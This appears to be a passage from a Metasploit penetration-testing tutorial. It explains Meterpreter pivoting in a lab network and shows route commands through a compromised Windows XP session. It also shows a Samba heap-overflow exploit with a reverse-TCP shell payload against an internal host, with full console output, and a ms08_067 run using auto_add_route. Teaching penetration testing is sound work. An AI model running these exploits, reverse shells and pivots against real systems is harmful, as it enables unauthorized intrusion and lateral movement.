Pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console. For example, if an attacker were to compromise one system, he could use pivoting to compromise other systems on the same network or to access systems to which he could not otherwise route traffic, for whatever reason.
For example, suppose you’re performing a penetration test from the Internet. You compromise a system through a vulnerability and have a Meterpreter console to the internal network. You can’t directly access other systems on the network, because the system you compromised did not provide you with everything you need to do so, but you need to penetrate the network further. Pivoting will allow you to attack multiple systems on the internal network through the Internet, using the Meterpreter console.
In the following example, we’ll attack a system from one subnet and route that system to attack another system. First, we’ll exploit the Windows XP machine, and then we’ll piggyback the attack from our attacking machine to an Ubuntu system on the internal network. We’ll come from a 10.10.1.1/24 address and attack systems within the 192.168.33.1/24 network.
We’ll assume that we already have access to one server via a compromise and will focus on establishing a connection to that network. Next, we introduce external scripts written with Meterpreter that can be found in the scripts/meterpreter/ directory. These scripts offer additional functionality that we can use within Meterpreter.
We begin by displaying local subnets on the compromised system within a Meterpreter session with run get_local_subnets
, as shown at .
[*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1075) meterpreter >run get_local_subnets
Local subnet: 192.168.33.0/255.255.255.0 meterpreter >background
msf exploit(handler) >route add 192.168.33.0 255.255.255.0 1
msf exploit(handler) >route print
Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.168.33.0 255.255.255.0 Session 1
We have successfully compromised our Windows XP machine and have full access to it. Next, we background our running session at and add a route
command to the Framework at , telling it to route the remote network ID over session 1, the background Meterpreter session. We then display active routes with route print
at , and we can clearly see at that, just as we desired, the route is active.
Next, we’ll set up a second exploit against the targeted Linux system. The specific exploit here is a Samba-based heap overflow, which would be vulnerable on our Metasploitable machine.
use msf exploit(handler) >use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) >set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp msf exploit(lsa_transnames_heap) >set LHOST 10.10.1.129
LHOST => 10.10.1.129 msf exploit(lsa_transnames_heap) >set LPORT 8080
LPORT => 8080 msf exploit(lsa_transnames_heap) >set RHOST 192.168.33.132
RHOST => 192.168.33.132 msf exploit(lsa_transnames_heap) >ifconfig
[*] exec: ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:47:e6:79 inet addr:10.10.1.129 Bcast:10.10.1.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe47:e679/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:23656 errors:0 dropped:0 overruns:0 frame:0 TX packets:32321 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4272582 (4.2 MB) TX bytes:17849775 (17.8 MB) Interrupt:19 Base address:0x2000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:600 errors:0 dropped:0 overruns:0 frame:0 TX packets:600 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:41386 (41.3 KB) TX bytes:41386 (41.3 KB) msf exploit(lsa_transnames_heap) >exploit
[*] Started reverse handler on 10.10.1.129:8080 [*] Creating nop sled.... [*] Trying to exploit Samba with address 0xffffe410... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789 ab:0.0@ncacn_np:192.168.33.132[lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ ncacn_np:192.168.33.132[lsarpc] ... [*] Calling the vulnerable function... [+] Server did not respond, this is expected [*] Trying to exploit Samba with address 0xffffe411... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0 @ncacn_np:192.168.33.132[lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0 @ncacn_np:192.168.33.132[lsarpc] ... [*] Calling the vulnerable function... [+] Server did not respond, this is expected [*] Trying to exploit Samba with address 0xffffe412... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789ab: 0.0@ncacn_np:192.168.33.132[lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123 456789ab:0.0@ncacn_np:192.168.33.132[lsarpc] ... [*] Calling the vulnerable function... [*] Sending stage (36 bytes) [*] Command shell session 1 opened (10.10.1.129:8080 -> 192.168.33.132:1608)
Compare the LHOST
and RHOST
variables to the network information displayed by ifconfig
. Our LHOST
option specifies the IP address of our attacking machine. Also notice, the RHOST
option IP address is set to a different network subnet and that we are attacking systems by tunneling our traffic through our compromised target to additional systems on the target’s network. We are leveraging the pivoting attack through Metasploit to pass communications through our exploited machine to the target machine that resides on the local subnet. In this case, if the heap overflow is successful, we should be presented with a reverse shell from 192.168.33.132, simply by leveraging the network communications on the already compromised machine. When we run the exploit with exploit
, we see at that a connection is set up as expected on a different machine, not the Windows XP machine. Now, to port scan through the pivot, we would use the scanner/portscan/tcp scanner module, which is built to handle routing through Metasploit.
You could also use the scanner/portscan/tcp scanner to conduct a series of port scans through your compromised target on the local subnet itself. We won’t go into the details here, but just know that you can perform port scanning on a compromised network leveraging this module.
In the preceding examples, we used the route add
command after we had compromised the system. Alternatively, to add the routes automatically to Meterpreter upon a new session spawn, we could use load auto_add_route
:
msf exploit(ms08_067_netapi) >load auto_add_route
[*] Successfully loaded plugin: auto_add_route msf exploit(ms08_067_netapi) >exploit
[*] Started reverse handler on 10.10.1.129:443 [*] Triggering the vulnerability... [*] Sending stage (748032 bytes) [*] Meterpreter session 1 opened (10.10.1.129:443 -> 192.168.33.130:1090) [*] AutoAddRoute: Routing new subnet 192.168.33.0/255.255.255.0 through session 1